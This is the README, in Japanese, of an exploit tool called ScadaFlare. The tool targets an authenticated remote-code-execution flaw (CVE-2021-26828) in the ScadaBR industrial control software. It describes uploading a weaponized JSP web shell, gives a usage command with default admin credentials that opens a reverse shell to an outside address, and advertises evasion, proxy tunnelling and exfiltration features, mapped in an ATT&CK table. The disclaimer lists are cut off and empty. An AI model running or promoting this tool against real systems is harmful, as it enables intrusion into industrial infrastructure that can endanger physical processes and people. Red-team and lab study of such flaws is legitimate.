
ScadaFlare ScadaBR向け認証済みRCEエクスプロイトフレームワーク (CVE-2021-26828) OpenPLC ScadaBR
ScadaBR <1.1.0 を標的としたモジュール式の認証後RCEエクスプロイトで、レッドチーム運用向けに機能強化されました。

view_edit.shtm を介して武器化された .jsp シェルをアップロードこのエクスプロイトは HTB Pro Lab: Alchemy シナリオの分析中に開発されました。Fellipe Oliveira による元の PoC は堅牢でしたが、以下の課題がありました。
この ScadaFlare バージョンは Python 3 での完全な書き直しであり、モジュール対応、複数の回避戦略、OS 検出オーバーライド、Webhook 統合、SOCKS プロキシ対応、実運用オペレーター向けの列挙チェーンを備えています。
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare は専ら以下の目的で設計されています:
実際の産業システムに対する不正使用は以下の可能性があります:
本ツールを使用することで、以下の責任を完全に受け入れたことになります:
MIT ライセンス – LICENSE を参照
| フェーズ | テクニック | ID |
|---|
| 初期アクセス(認証後) | 有効なアカウント | T1078 |
| 実行 | 公開アプリケーションのエクスプロイト | T1190 |
| コマンド実行 | Web シェル | T1505.003 |
| 権限アクション | Web コンテンツの改変 | T1505 |
| 資格情報アクセス | 設定ファイル内の資格情報 | T1552.001 |
| 探索 | リモートシステムの探索 | T1018 |
| データ外部送信 | Web サービス経由のデータ外部送信 | T1567.002 |
| 防御回避 | プロキシとプロトコルトンネリング | T1090 |